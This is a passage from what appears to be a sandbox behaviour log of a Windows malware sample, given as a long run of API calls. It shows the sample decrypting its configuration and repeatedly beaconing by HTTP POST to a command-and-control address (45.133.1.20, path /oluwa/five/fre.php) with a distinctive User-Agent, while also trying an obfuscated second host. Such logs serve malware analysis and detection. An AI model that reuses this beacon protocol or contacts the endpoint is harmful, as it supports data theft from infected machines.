ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.688] GetProcessHeap () returned 0x6a0000 [0252.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0252.688] GetProcessHeap () returned 0x6a0000 [0252.688] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.688] GetProcessHeap () returned 0x6a0000 [0252.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0252.689] GetProcessHeap () returned 0x6a0000 [0252.689] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0252.690] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.690] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.696] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.697] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0252.705] GetProcessHeap () returned 0x6a0000 [0252.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.706] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.706] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0252.707] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.708] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.709] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.709] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.709] GetProcessHeap () returned 0x6a0000 [0252.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.711] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0252.712] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.712] CryptDestroyKey (hKey=0x6ad020) returned 1 [0252.713] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.714] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0252.714] GetProcessHeap () returned 0x6a0000 [0252.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.716] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.717] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0252.718] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.718] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0252.719] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.719] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0252.720] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.721] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0252.721] GetProcessHeap () returned 0x6a0000 [0252.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0252.721] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0252.721] GetProcessHeap () returned 0x6a0000 [0252.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0252.721] socket (af=2, type=1, protocol=6) returned 0x860 [0252.721] connect (s=0x860, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0252.745] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0252.745] GetProcessHeap () returned 0x6a0000 [0252.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beca0 [0252.745] GetProcessHeap () returned 0x6a0000 [0252.745] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0252.746] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.747] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.747] GetProcessHeap () returned 0x6a0000 [0252.747] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba5b8 [0252.747] GetProcessHeap () returned 0x6a0000 [0252.747] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.747] GetProcessHeap () returned 0x6a0000 [0252.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0252.749] GetProcessHeap () returned 0x6a0000 [0252.749] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0252.750] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.751] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.751] GetProcessHeap () returned 0x6a0000 [0252.752] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0252.752] GetProcessHeap () returned 0x6a0000 [0252.752] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.752] send (s=0x860, buf=0x6bd460*, len=242, flags=0) returned 242 [0252.753] send (s=0x860, buf=0x6bb998*, len=159, flags=0) returned 159 [0252.753] GetProcessHeap () returned 0x6a0000 [0252.753] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0252.753] recv (in: s=0x860, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0252.823] GetProcessHeap () returned 0x6a0000 [0252.824] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0252.825] GetProcessHeap () returned 0x6a0000 [0252.825] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0252.825] GetProcessHeap () returned 0x6a0000 [0252.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5b8 | out: hHeap=0x6a0000) returned 1 [0252.826] GetProcessHeap () returned 0x6a0000 [0252.826] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beca0 | out: hHeap=0x6a0000) returned 1 [0252.826] closesocket (s=0x860) returned 0 [0252.827] GetProcessHeap () returned 0x6a0000 [0252.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0252.827] GetProcessHeap () returned 0x6a0000 [0252.827] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.827] GetProcessHeap () returned 0x6a0000 [0252.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0252.828] GetProcessHeap () returned 0x6a0000 [0252.828] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0252.829] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1590) returned 0x860 [0252.831] Sleep (dwMilliseconds=0xea60) [0252.832] GetProcessHeap () returned 0x6a0000 [0252.832] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0252.833] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.834] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.839] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.839] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0252.846] GetProcessHeap () returned 0x6a0000 [0252.846] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6da5a8 [0252.846] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.847] CryptImportKey (in: hProv=0x6beb90, pbData=0x6da5a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0252.848] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.850] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.854] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.854] GetProcessHeap () returned 0x6a0000 [0252.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6da5a8 | out: hHeap=0x6a0000) returned 1 [0252.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.856] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0252.857] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.857] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0252.858] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.858] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0252.859] GetProcessHeap () returned 0x6a0000 [0252.859] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.859] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.860] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.860] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.861] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.869] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.869] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.870] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.870] GetProcessHeap () returned 0x6a0000 [0252.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0252.870] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.871] GetProcessHeap () returned 0x6a0000 [0252.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0252.871] GetProcessHeap () returned 0x6a0000 [0252.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0252.872] GetProcessHeap () returned 0x6a0000 [0252.872] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0252.872] GetProcessHeap () returned 0x6a0000 [0252.872] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0252.874] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.874] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.882] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.882] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0252.891] GetProcessHeap () returned 0x6a0000 [0252.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0252.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.893] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0252.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.895] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.896] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.896] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.896] GetProcessHeap () returned 0x6a0000 [0252.897] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0252.898] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.898] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0252.899] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.899] CryptDestroyKey (hKey=0x6ad020) returned 1 [0252.900] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0252.901] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0252.901] GetProcessHeap () returned 0x6a0000 [0252.901] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0252.902] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.903] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0252.904] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.904] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0252.905] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.906] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0252.906] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0252.907] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0252.907] GetProcessHeap () returned 0x6a0000 [0252.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0252.907] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0252.907] GetProcessHeap () returned 0x6a0000 [0252.907] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0252.910] socket (af=2, type=1, protocol=6) returned 0x864 [0252.912] connect (s=0x864, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0252.958] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0252.958] GetProcessHeap () returned 0x6a0000 [0252.958] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0252.959] GetProcessHeap () returned 0x6a0000 [0252.959] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0252.961] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.963] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0252.963] GetProcessHeap () returned 0x6a0000 [0252.963] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba4f8 [0252.963] GetProcessHeap () returned 0x6a0000 [0252.964] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.964] GetProcessHeap () returned 0x6a0000 [0252.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0252.964] GetProcessHeap () returned 0x6a0000 [0252.964] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0252.966] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0252.969] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0252.969] GetProcessHeap () returned 0x6a0000 [0252.969] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0252.969] GetProcessHeap () returned 0x6a0000 [0252.969] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0252.970] send (s=0x864, buf=0x6bd460*, len=242, flags=0) returned 242 [0252.970] send (s=0x864, buf=0x6bb998*, len=159, flags=0) returned 159 [0252.971] GetProcessHeap () returned 0x6a0000 [0252.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d9f18 [0252.971] recv (in: s=0x864, buf=0x6d9f18, len=4048, flags=0 | out: buf=0x6d9f18*) returned 204 [0253.040] GetProcessHeap () returned 0x6a0000 [0253.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0253.041] GetProcessHeap () returned 0x6a0000 [0253.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0253.041] GetProcessHeap () returned 0x6a0000 [0253.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba4f8 | out: hHeap=0x6a0000) returned 1 [0253.042] GetProcessHeap () returned 0x6a0000 [0253.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0253.043] closesocket (s=0x864) returned 0 [0253.044] GetProcessHeap () returned 0x6a0000 [0253.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0253.044] GetProcessHeap () returned 0x6a0000 [0253.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.044] GetProcessHeap () returned 0x6a0000 [0253.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0253.044] GetProcessHeap () returned 0x6a0000 [0253.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0253.045] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d9f18, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1594) returned 0x864 [0253.047] Sleep (dwMilliseconds=0xea60) [0253.049] GetProcessHeap () returned 0x6a0000 [0253.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0253.049] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.050] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0253.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.058] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf0e0) returned 1 [0253.067] GetProcessHeap () returned 0x6a0000 [0253.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6db0d0 [0253.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.068] CryptImportKey (in: hProv=0x6bf0e0, pbData=0x6db0d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0253.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.069] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0253.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.070] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0253.070] GetProcessHeap () returned 0x6a0000 [0253.071] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db0d0 | out: hHeap=0x6a0000) returned 1 [0253.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.072] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0253.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.073] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0253.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.074] CryptReleaseContext (hProv=0x6bf0e0, dwFlags=0x0) returned 1 [0253.074] GetProcessHeap () returned 0x6a0000 [0253.074] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0253.078] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.078] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0253.079] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.080] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0253.080] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.081] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0253.081] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0253.082] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0253.082] GetProcessHeap () returned 0x6a0000 [0253.082] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0253.082] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0253.082] GetProcessHeap () returned 0x6a0000 [0253.082] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0253.083] GetProcessHeap () returned 0x6a0000 [0253.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0253.083] GetProcessHeap () returned 0x6a0000 [0253.083] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0253.083] GetProcessHeap () returned 0x6a0000 [0253.083] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0253.085] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0253.086] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: 